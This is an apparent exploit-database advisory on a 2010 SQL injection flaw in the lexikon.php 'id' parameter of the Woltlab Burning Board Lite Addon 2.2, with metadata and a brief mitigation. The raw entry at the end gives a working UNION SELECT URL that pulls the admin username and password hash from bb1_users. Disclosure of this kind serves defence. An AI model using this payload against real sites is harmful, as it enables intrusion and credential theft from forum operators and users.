Woltlab Burning Board Lite Addon (lexikon.php) SQL Injection Vulnerability

vendor:

Woltlab Burning Board Lite Addon

by:

n3w7u

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Woltlab Burning Board Lite Addon

Affected Version From: 2.2

Affected Version To: 2.2

Patch Exists: NO

Related CWE: N/A

CPE: a:woltlab:woltlab_burning_board_lite_addon

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: PHP

2010

Woltlab Burning Board Lite Addon (lexikon.php) SQL Injection Vulnerability

A vulnerability exists in Woltlab Burning Board Lite Addon (lexikon.php) which allows an attacker to inject malicious SQL queries via the 'id' parameter. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to sensitive information such as usernames and passwords.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-.
  
 ~ Woltlab Burning Board Lite Addon (lexikon.php) SQL Injection Vulnerability  ~
  
.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-.
 
[+] Autor: n3w7u
 
[+] Vulnerabilities [ SQL Injection ]

[+] Page: http://www.mywbb.info/board/thread.php?threadid=125185

[+] Language: [ PHP ]
 
[+] Version: 2.2

[+] Date: 21.03.2010
 

.-=--=--=--=--=--=--=--=--=--=--=-.
 
[+] Vulnerability
 
    lexikon.php?action=show&id=
     
 
[+] Exploitable
 
    http://[host]/[path]/lexikon.php?action=show&id=null+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8+from+bb1_users+where+userid=1--